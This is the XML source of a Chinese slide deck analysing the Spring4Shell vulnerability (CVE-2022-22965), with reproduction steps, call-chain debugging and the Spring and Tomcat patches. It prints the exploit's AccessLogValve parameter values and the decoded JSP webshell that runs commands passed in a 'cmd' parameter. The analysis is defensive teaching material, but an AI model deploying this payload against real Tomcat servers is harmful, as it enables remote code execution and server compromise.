                    <a:pt x="12" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="817"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="530" y="779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52" y="779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530" y="566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530" y="779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FA2E2-848D-4B81-9C8D-0FCB29735EB9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03C8AF01-C57A-4D67-82C1-1F2F44AFCB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2F167-420C-40B1-9CFE-8EFA578391C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91E42-D657-49D1-8EB6-0CACAB33E6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使用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0" y="396875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" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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BF63C-51F9-41A7-B835-5C127B811F0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A74AA12F-CC77-4A44-80F4-8E0AE8590DD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D180D33-4E58-4D2F-84BC-5CF513AC2BE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8A7D465-D1CD-4779-B5D1-C12FDD1BE23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 advClick="0" advTm="3000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FD180D33-4E58-4D2F-84BC-5CF513AC2BE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B8A7D465-D1CD-4779-B5D1-C12FDD1BE23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slow" advClick="0" advTm="3000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1625600"/>
            <a:ext cx="12192000" cy="320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Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8599488" y="5440363"/>
            <a:ext cx="1114425" cy="996950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 844682 w 528"/>
              <a:gd name="T1" fmla="*/ 619489 h 471"/>
              <a:gd name="T2" fmla="*/ 908033 w 528"/>
              <a:gd name="T3" fmla="*/ 589889 h 471"/>
              <a:gd name="T4" fmla="*/ 908033 w 528"/>
              <a:gd name="T5" fmla="*/ 587775 h 471"/>
              <a:gd name="T6" fmla="*/ 908033 w 528"/>
              <a:gd name="T7" fmla="*/ 431317 h 471"/>
              <a:gd name="T8" fmla="*/ 846793 w 528"/>
              <a:gd name="T9" fmla="*/ 460917 h 471"/>
              <a:gd name="T10" fmla="*/ 844682 w 528"/>
              <a:gd name="T11" fmla="*/ 619489 h 471"/>
              <a:gd name="T12" fmla="*/ 190053 w 528"/>
              <a:gd name="T13" fmla="*/ 431317 h 471"/>
              <a:gd name="T14" fmla="*/ 190053 w 528"/>
              <a:gd name="T15" fmla="*/ 589889 h 471"/>
              <a:gd name="T16" fmla="*/ 523703 w 528"/>
              <a:gd name="T17" fmla="*/ 748461 h 471"/>
              <a:gd name="T18" fmla="*/ 578607 w 528"/>
              <a:gd name="T19" fmla="*/ 748461 h 471"/>
              <a:gd name="T20" fmla="*/ 783442 w 528"/>
              <a:gd name="T21" fmla="*/ 649089 h 471"/>
              <a:gd name="T22" fmla="*/ 783442 w 528"/>
              <a:gd name="T23" fmla="*/ 490517 h 471"/>
              <a:gd name="T24" fmla="*/ 549043 w 528"/>
              <a:gd name="T25" fmla="*/ 604689 h 471"/>
              <a:gd name="T26" fmla="*/ 190053 w 528"/>
              <a:gd name="T27" fmla="*/ 431317 h 471"/>
              <a:gd name="T28" fmla="*/ 832011 w 528"/>
              <a:gd name="T29" fmla="*/ 416517 h 471"/>
              <a:gd name="T30" fmla="*/ 825676 w 528"/>
              <a:gd name="T31" fmla="*/ 414402 h 471"/>
              <a:gd name="T32" fmla="*/ 606059 w 528"/>
              <a:gd name="T33" fmla="*/ 293887 h 471"/>
              <a:gd name="T34" fmla="*/ 608171 w 528"/>
              <a:gd name="T35" fmla="*/ 279087 h 471"/>
              <a:gd name="T36" fmla="*/ 557490 w 528"/>
              <a:gd name="T37" fmla="*/ 228344 h 471"/>
              <a:gd name="T38" fmla="*/ 506809 w 528"/>
              <a:gd name="T39" fmla="*/ 279087 h 471"/>
              <a:gd name="T40" fmla="*/ 557490 w 528"/>
              <a:gd name="T41" fmla="*/ 329830 h 471"/>
              <a:gd name="T42" fmla="*/ 593389 w 528"/>
              <a:gd name="T43" fmla="*/ 317145 h 471"/>
              <a:gd name="T44" fmla="*/ 808783 w 528"/>
              <a:gd name="T45" fmla="*/ 437660 h 471"/>
              <a:gd name="T46" fmla="*/ 832011 w 528"/>
              <a:gd name="T47" fmla="*/ 416517 h 471"/>
              <a:gd name="T48" fmla="*/ 1114980 w 528"/>
              <a:gd name="T49" fmla="*/ 279087 h 471"/>
              <a:gd name="T50" fmla="*/ 549043 w 528"/>
              <a:gd name="T51" fmla="*/ 0 h 471"/>
              <a:gd name="T52" fmla="*/ 0 w 528"/>
              <a:gd name="T53" fmla="*/ 266401 h 471"/>
              <a:gd name="T54" fmla="*/ 0 w 528"/>
              <a:gd name="T55" fmla="*/ 289659 h 471"/>
              <a:gd name="T56" fmla="*/ 549043 w 528"/>
              <a:gd name="T57" fmla="*/ 556060 h 471"/>
              <a:gd name="T58" fmla="*/ 783442 w 528"/>
              <a:gd name="T59" fmla="*/ 441888 h 471"/>
              <a:gd name="T60" fmla="*/ 783442 w 528"/>
              <a:gd name="T61" fmla="*/ 433431 h 471"/>
              <a:gd name="T62" fmla="*/ 593389 w 528"/>
              <a:gd name="T63" fmla="*/ 334059 h 471"/>
              <a:gd name="T64" fmla="*/ 557490 w 528"/>
              <a:gd name="T65" fmla="*/ 344630 h 471"/>
              <a:gd name="T66" fmla="*/ 492027 w 528"/>
              <a:gd name="T67" fmla="*/ 279087 h 471"/>
              <a:gd name="T68" fmla="*/ 557490 w 528"/>
              <a:gd name="T69" fmla="*/ 211430 h 471"/>
              <a:gd name="T70" fmla="*/ 622953 w 528"/>
              <a:gd name="T71" fmla="*/ 279087 h 471"/>
              <a:gd name="T72" fmla="*/ 622953 w 528"/>
              <a:gd name="T73" fmla="*/ 285430 h 471"/>
              <a:gd name="T74" fmla="*/ 846793 w 528"/>
              <a:gd name="T75" fmla="*/ 410174 h 471"/>
              <a:gd name="T76" fmla="*/ 1114980 w 528"/>
              <a:gd name="T77" fmla="*/ 279087 h 471"/>
              <a:gd name="T78" fmla="*/ 832011 w 528"/>
              <a:gd name="T79" fmla="*/ 416517 h 471"/>
              <a:gd name="T80" fmla="*/ 834123 w 528"/>
              <a:gd name="T81" fmla="*/ 619489 h 471"/>
              <a:gd name="T82" fmla="*/ 853128 w 528"/>
              <a:gd name="T83" fmla="*/ 649089 h 471"/>
              <a:gd name="T84" fmla="*/ 836235 w 528"/>
              <a:gd name="T85" fmla="*/ 676575 h 471"/>
              <a:gd name="T86" fmla="*/ 851017 w 528"/>
              <a:gd name="T87" fmla="*/ 676575 h 471"/>
              <a:gd name="T88" fmla="*/ 878469 w 528"/>
              <a:gd name="T89" fmla="*/ 995834 h 471"/>
              <a:gd name="T90" fmla="*/ 768660 w 528"/>
              <a:gd name="T91" fmla="*/ 995834 h 471"/>
              <a:gd name="T92" fmla="*/ 796113 w 528"/>
              <a:gd name="T93" fmla="*/ 676575 h 471"/>
              <a:gd name="T94" fmla="*/ 810894 w 528"/>
              <a:gd name="T95" fmla="*/ 676575 h 471"/>
              <a:gd name="T96" fmla="*/ 794001 w 528"/>
              <a:gd name="T97" fmla="*/ 649089 h 471"/>
              <a:gd name="T98" fmla="*/ 810894 w 528"/>
              <a:gd name="T99" fmla="*/ 619489 h 471"/>
              <a:gd name="T100" fmla="*/ 808783 w 528"/>
              <a:gd name="T101" fmla="*/ 437660 h 471"/>
              <a:gd name="T102" fmla="*/ 832011 w 528"/>
              <a:gd name="T103" fmla="*/ 416517 h 47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28"/>
              <a:gd name="T157" fmla="*/ 0 h 471"/>
              <a:gd name="T158" fmla="*/ 528 w 528"/>
              <a:gd name="T159" fmla="*/ 471 h 47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1210604" y="2358530"/>
            <a:ext cx="989300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Shell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漏洞分析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50863" y="476250"/>
            <a:ext cx="2325687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文本框 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4300538" y="3743552"/>
            <a:ext cx="3711575" cy="3987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2022.04.17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张芊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28813" y="3943577"/>
            <a:ext cx="26289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 flipV="1">
            <a:off x="8977313" y="4821238"/>
            <a:ext cx="358775" cy="2063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>
            <a:off x="7729538" y="3943577"/>
            <a:ext cx="2543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Spring BeanWrapperImpl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339850"/>
            <a:ext cx="111213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在Spring中，BeanWrapper接口是对Bean的包装，定义了大量可以非常方便的方法对Bean的属性进行访问和设置。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BeanWrapperImpl类是BeanWrapper接口的默认实现，BeanWrapperImpl.wrappedObject属性即为被包装的Bean对象，BeanWrapperImpl对Bean的属性访问和设置最终调用的是PropertyDescriptor。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后面的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代码和输出结果可以看到，</a:t>
            </a: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通过BeanWrapperImpl可以很方便地访问和设置Bean的属性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，比直接使用PropertyDescriptor要简单很多。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Spring BeanWrapperImpl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89380"/>
            <a:ext cx="12192000" cy="52336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Tomcat AccessLogValve 和 access_log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545" y="1219200"/>
            <a:ext cx="111213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Tomcat的Valve用于处理请求和响应，通过组合了多个Valve的Pipeline，来实现按次序对请求和响应进行一系列的处理。其中AccessLogValve用来记录访问日志access_log。Tomcat的server.xml中默认配置了AccessLogValve，所有部署在Tomcat中的Web应用均会执行该Valve，内容如下：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492885" y="3169285"/>
            <a:ext cx="9464040" cy="1350010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&lt;Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>               prefix="localhost_access_log" suffix=".txt"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>               pattern="%h %l %u %t &amp;quot;%r&amp;quot; %s %b" /&gt;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4210" y="4627880"/>
            <a:ext cx="11121390" cy="2066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00000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2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下面列出配置中出现的几个重要属性：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200"/>
              </a:spcAft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directory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：access_log文件输出目录。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200"/>
              </a:spcAft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prefix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：access_log文件名前缀。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200"/>
              </a:spcAft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pattern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：access_log文件内容格式。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200"/>
              </a:spcAft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suffix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：access_log文件名后缀。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200"/>
              </a:spcAft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fileDateFormat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：access_log文件名日期后缀，默认为.yyyy-MM-dd。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漏洞复现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545" y="1219200"/>
            <a:ext cx="11121390" cy="5400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将 SpringMVC 参数绑定中的User类和UserController类添加到项目中。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执行 maven 打包命令，将项目打包为 war 包，命令如下：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mvn clean package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将项目中 target 目录里打包生成的 CVE-2022-22965-0.0.1-SNAPSHOT.war，复制到Tomcat的 webapps 目录下，并启动Tomcat。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https://github.com/BobTheShoplifter/Spring4Shell-POC/blob/0c557e85ba903c7ad6f50c0306f6c8271736c35e/poc.py 下载POC文件，执行如下命令：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python3 poc.py --url http://localhost:8080/CVE-2022-22965-0.0.1-SNAPSHOT/addUser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漏洞复现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6515" y="1181735"/>
            <a:ext cx="8104505" cy="5553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3695" y="1219200"/>
            <a:ext cx="31838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中添加对应参数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漏洞复现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3695" y="1219200"/>
            <a:ext cx="31838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webshell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执行结果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3445" y="856615"/>
            <a:ext cx="8758555" cy="60013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漏洞复现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545" y="1219200"/>
            <a:ext cx="11121390" cy="5400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将 SpringMVC 参数绑定中的User类和UserController类添加到项目中。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执行 maven 打包命令，将项目打包为 war 包，命令如下：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mvn clean package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将项目中 target 目录里打包生成的 CVE-2022-22965-0.0.1-SNAPSHOT.war，复制到Tomcat的 webapps 目录下，并启动Tomcat。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https://github.com/BobTheShoplifter/Spring4Shell-POC/blob/0c557e85ba903c7ad6f50c0306f6c8271736c35e/poc.py 下载POC文件，执行如下命令：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python3 poc.py --url http://localhost:8080/CVE-2022-22965-0.0.1-SNAPSHOT/addUser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545" y="1219200"/>
            <a:ext cx="111213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我们从POC入手进行分析。通过对POC中的data URL解码后可以拆分成如下5对参数。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27100" y="1971675"/>
            <a:ext cx="9525635" cy="2246630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参数名：class.module.classLoader.resources.context.parent.pipeline.first.pattern</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数值：%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i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27100" y="4417695"/>
            <a:ext cx="9525635" cy="2246630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User.getClass()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java.lang.Class.getModule()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......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SomeClass.setPattern()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228725"/>
            <a:ext cx="9753600" cy="353885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312545" y="4976495"/>
            <a:ext cx="9622790" cy="1428115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propertyPath：class.module.classLoader.resources.context.parent.pipeline.first.pattern</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>nestedPath：module.classLoader.resources.context.parent.pipeline.first.pattern</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>nestedProperty：class，即本轮迭代需要解析的嵌套参数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12545" y="4976495"/>
            <a:ext cx="9622790" cy="1428115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propertyPath：module.classLoader.resources.context.parent.pipeline.first.pattern</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>nestedPath：classLoader.resources.context.parent.pipeline.first.pattern，作为下一轮迭代的propertyPath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149985"/>
            <a:ext cx="9753600" cy="3695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874137" y="1721143"/>
            <a:ext cx="4826000" cy="5295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b="1" spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8F000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CVE-2022-22965</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" spc="200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8F000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874137" y="2564423"/>
            <a:ext cx="4826000" cy="5295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b="1" spc="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2800" b="1" spc="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漏洞复现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="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4874137" y="3407703"/>
            <a:ext cx="4826000" cy="5295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b="1" spc="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2800" b="1" spc="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漏洞分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="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4874137" y="4250983"/>
            <a:ext cx="4826000" cy="5295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b="1" spc="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 sz="2800" b="1" spc="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修复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" spc="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800" b="1" spc="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防御</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="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79491" y="2095491"/>
            <a:ext cx="2286018" cy="2286018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3333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952491" y="1968491"/>
            <a:ext cx="2286018" cy="2286018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="3333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502370" y="2250733"/>
            <a:ext cx="1107996" cy="1753235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spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8F000B"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B060402020209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6000" spc="200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8F000B"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:ea typeface="汉仪旗黑-85S" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId8"/>
    </p:custData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75310" y="2192655"/>
            <a:ext cx="3532505" cy="1770380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User.getClass()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java.lang.Class.getModule()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java.lang.Module.get???()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5310" y="1422400"/>
            <a:ext cx="4983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/>
              <a:t>经过第二轮迭代，我们可以得出第二层调用链：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7960" y="1019810"/>
            <a:ext cx="7711440" cy="29260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5310" y="4104640"/>
            <a:ext cx="4983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/>
              <a:t>经过第三轮迭代，我们可以得出第三层调用链：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75310" y="4472940"/>
            <a:ext cx="10163175" cy="2244725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User.getClass()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java.lang.Class.getModule()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java.lang.Module.getClassLoader()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org.apache.catalina.loader.ParallelWebappClassLoader.get???() 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75310" y="1654810"/>
            <a:ext cx="10796270" cy="5074285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User.getClass()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java.lang.Class.getModule()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java.lang.Module.getClassLoader()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org.apache.catalina.loader.ParallelWebappClassLoader.getResources()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    org.apache.catalina.webresources.StandardRoot.getContext()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        org.apache.catalina.core.StandardContext.getParent()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            org.apache.catalina.core.StandardHost.getPipeline()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                org.apache.catalina.core.StandardPipeline.getFirst()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                    org.apache.catalina.valves.AccessLogValve.setPattern()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5310" y="1287145"/>
            <a:ext cx="1046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/>
              <a:t>接着按照上述调试方法，依次调试剩余的递归轮次并观察相应的变量，最终可以得到如下完整的调用链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219200"/>
            <a:ext cx="111213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我们可以看到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payload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的数据格式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也就是access_log的文件内容格式。我们再来看pattern参数值，除了常规的Java代码外，还夹杂了三个特殊片段。通过翻阅AccessLogValve的父类AbstractAccessLogValve的源码，可以找到相关的文档：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755" y="2695575"/>
            <a:ext cx="9163685" cy="44475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219200"/>
            <a:ext cx="111213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即通过AccessLogValve输出的日志中可以通过形如%{param}i等形式直接引用HTTP请求和响应中的内容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;结合poc.py中headers变量内容：最终可以得到AccessLogValve输出的日志实际内容如下（已格式化）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：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35330" y="2646045"/>
            <a:ext cx="9468485" cy="4064000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400"/>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>if("j".equals(request.getParameter("pwd"))){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         java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();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 int a = -1;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 byte[] b = new byte[2048];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 while((a=in.read(b))!=-1){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                   out.println(new String(b));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         }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}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>%&gt;//</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"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219200"/>
            <a:ext cx="11121390" cy="5862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很明显，这是一个JSP webshell。这个webshell输出到了哪儿？名称是什么？能被直接访问和正常解析执行吗？我们接下来看其余的参数。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea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suffix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参数名：class.module.classLoader.resources.context.parent.pipeline.first.suffix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参数值：.jsp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按照pattern参数相同的调试方法，suffix参数最终将AccessLogValve.suffix设置为.jsp，即access_log的文件名后缀。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directory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参数名：class.module.classLoader.resources.context.parent.pipeline.first.directory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参数值：webapps/ROOT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按照pattern参数相同的调试方法，directory参数最终将AccessLogValve.directory设置为webapps/ROOT，即access_log的文件输出目录。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这里提下webapps/ROOT目录，该目录为Tomcat Web应用根目录。部署到目录下的Web应用，可以直接通过http://localhost:8080/根目录访问。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231265"/>
            <a:ext cx="11121390" cy="4477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prefix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参数名：class.module.classLoader.resources.context.parent.pipeline.first.prefix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参数值：tomcatwar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按照pattern参数相同的调试方法，prefix参数最终将AccessLogValve.prefix设置为tomcatwar，即access_log的文件名前缀。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fileDateFormat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参数名：class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat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参数值：空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按照pattern参数相同的调试方法，fileDateFormat参数最终将AccessLogValve.fileDateFormat设置为空，即access_log的文件名不包含日期。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231265"/>
            <a:ext cx="1112139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从java.lang.Module到org.apache.catalina.loader.ParallelWebappClassLoader，是将调用链转移到Tomcat，并最终利用AccessLogValve输出webshell的关键。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ParallelWebappClassLoader在Web应用以war包部署到Tomcat中时使用到。现在很大部分公司会使用SpringBoot可执行jar包的方式运行Web应用，在这种方式下，我们看下classLoader嵌套参数被解析为什么，如下图。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" y="3060700"/>
            <a:ext cx="9753600" cy="3695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231265"/>
            <a:ext cx="11121390" cy="1398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可以看到，使用SpringBoot可执行jar包的方式运行，classLoader嵌套参数被解析为org.springframework.boot.loader.LaunchedURLClassLoader，查看其源码，没有getResources()方法。具体源码请参考文章末尾的参考章节。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0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这就是为什么本漏洞利用条件之一，Web应用部署方式需要是Tomcat war包部署。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" y="3060700"/>
            <a:ext cx="9753600" cy="3695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231265"/>
            <a:ext cx="11121390" cy="2476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在前面章节中AbstractNestablePropertyAccessor nestedPa = getNestedPropertyAccessor(nestedProperty);调用的过程中，实际上Spring做了一道防御。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Spring使用org.springframework.beans.CachedIntrospectionResults缓存并返回Java Bean中可以被BeanWrapperImpl使用的PropertyDescriptor。在CachedIntrospectionResults第289行构造方法中：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4084320"/>
            <a:ext cx="9753600" cy="1924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231265"/>
            <a:ext cx="111213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该行的意思是：当Bean的类型为java.lang.Class时，不返回classLoader和protectionDomain的PropertyDescriptor。Spring在构建嵌套参数的调用链时，会根据CachedIntrospectionResults缓存的PropertyDescriptor进行构建：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4084320"/>
            <a:ext cx="9753600" cy="1924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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE-2022-22965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34695" y="1526391"/>
            <a:ext cx="4818025" cy="37846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野外流传了一小段时间后，Spring官方在3月31日正式发布了漏洞信息，漏洞编号为CVE-2022-22965</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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该漏洞为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远程代码执行漏洞，官方发布了Spring Framework 5.3.18和5.2.20的补丁修复了该漏洞，且依赖 Spring Framework 5.3.18 的 Spring Boot 2.6.6 和 2.5.12 已经发布。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575" y="5511165"/>
            <a:ext cx="4716145" cy="829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ts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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请遵循国家漏洞管理办法，在漏洞公开前，不要发布相关信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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6610" y="1670050"/>
            <a:ext cx="6033135" cy="22517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漏洞分析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3324860"/>
            <a:ext cx="11096625" cy="1014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这在JDK&lt;=1.8都是有效的。但是在JDK 1.9之后，Java为了支持模块化，在java.lang.Class中增加了module属性和对应的getModule()方法，自然就能通过如下调用链绕过判断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125220"/>
            <a:ext cx="111213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也就意味着class.classLoader...这种嵌套参数走不通，即形如下方的调用链：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58825" y="1678305"/>
            <a:ext cx="9453245" cy="1646555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Foo.getClass()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java.lang.Class.getClassLoader()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BarClassLoader.getBaz()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2630" y="4338955"/>
            <a:ext cx="9525635" cy="2330450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Foo.getClass()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java.lang.Class.getModule() // 绕过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java.lang.Module.getClassLoader()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   BarClassLoader.getBaz()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>                ......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漏洞修复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125220"/>
            <a:ext cx="11121390" cy="155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Spring 5.3.18补丁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通过对比Spring 5.3.17和5.3.18的版本，可以看到在3月31日有一项名为“Redefine PropertyDescriptor filter的”提交。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0" y="3178810"/>
            <a:ext cx="9753600" cy="27622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漏洞修复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125220"/>
            <a:ext cx="11121390" cy="2476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Spring 5.3.18补丁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进入该提交，可以看到对CachedIntrospectionResults构造函数中Java Bean的PropertyDescriptor的过滤条件被修改了：当Java Bean的类型为java.lang.Class时，仅允许获取name以及Name后缀的属性描述符。在章节3.2.2 关键点二：JDK版本中，利用java.lang.Class.getModule()的链路就走不通了。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035" y="3779520"/>
            <a:ext cx="9753600" cy="27863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漏洞修复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125220"/>
            <a:ext cx="11121390" cy="155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Tomcat 9.0.62补丁</a:t>
            </a:r>
            <a:endParaRPr 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通过对比Tomcat 9.0.61和9.0.62的版本，可以看到在4月1日有一项名为“Security hardening. Deprecate getResources() and always return null.”提交。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783840"/>
            <a:ext cx="9753600" cy="4038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漏洞修复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125220"/>
            <a:ext cx="11121390" cy="2476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Tomcat 9.0.62补丁</a:t>
            </a:r>
            <a:endParaRPr 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进入该提交，可以看到对getResources()方法的返回值做了修改，直接返回null。WebappClassLoaderBase即ParallelWebappClassLoader的父类，在章节3.2.1 关键点一：Web应用部署方式中，利用org.apache.catalina.loader.ParallelWebappClassLoader.getResources()的链路就走不通了。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3601720"/>
            <a:ext cx="9633585" cy="3702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漏洞防范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655" y="1133475"/>
            <a:ext cx="9331960" cy="55702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1612900"/>
            <a:ext cx="12192000" cy="320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" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8599488" y="5440363"/>
            <a:ext cx="1114425" cy="996950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 844682 w 528"/>
              <a:gd name="T1" fmla="*/ 619489 h 471"/>
              <a:gd name="T2" fmla="*/ 908033 w 528"/>
              <a:gd name="T3" fmla="*/ 589889 h 471"/>
              <a:gd name="T4" fmla="*/ 908033 w 528"/>
              <a:gd name="T5" fmla="*/ 587775 h 471"/>
              <a:gd name="T6" fmla="*/ 908033 w 528"/>
              <a:gd name="T7" fmla="*/ 431317 h 471"/>
              <a:gd name="T8" fmla="*/ 846793 w 528"/>
              <a:gd name="T9" fmla="*/ 460917 h 471"/>
              <a:gd name="T10" fmla="*/ 844682 w 528"/>
              <a:gd name="T11" fmla="*/ 619489 h 471"/>
              <a:gd name="T12" fmla="*/ 190053 w 528"/>
              <a:gd name="T13" fmla="*/ 431317 h 471"/>
              <a:gd name="T14" fmla="*/ 190053 w 528"/>
              <a:gd name="T15" fmla="*/ 589889 h 471"/>
              <a:gd name="T16" fmla="*/ 523703 w 528"/>
              <a:gd name="T17" fmla="*/ 748461 h 471"/>
              <a:gd name="T18" fmla="*/ 578607 w 528"/>
              <a:gd name="T19" fmla="*/ 748461 h 471"/>
              <a:gd name="T20" fmla="*/ 783442 w 528"/>
              <a:gd name="T21" fmla="*/ 649089 h 471"/>
              <a:gd name="T22" fmla="*/ 783442 w 528"/>
              <a:gd name="T23" fmla="*/ 490517 h 471"/>
              <a:gd name="T24" fmla="*/ 549043 w 528"/>
              <a:gd name="T25" fmla="*/ 604689 h 471"/>
              <a:gd name="T26" fmla="*/ 190053 w 528"/>
              <a:gd name="T27" fmla="*/ 431317 h 471"/>
              <a:gd name="T28" fmla="*/ 832011 w 528"/>
              <a:gd name="T29" fmla="*/ 416517 h 471"/>
              <a:gd name="T30" fmla="*/ 825676 w 528"/>
              <a:gd name="T31" fmla="*/ 414402 h 471"/>
              <a:gd name="T32" fmla="*/ 606059 w 528"/>
              <a:gd name="T33" fmla="*/ 293887 h 471"/>
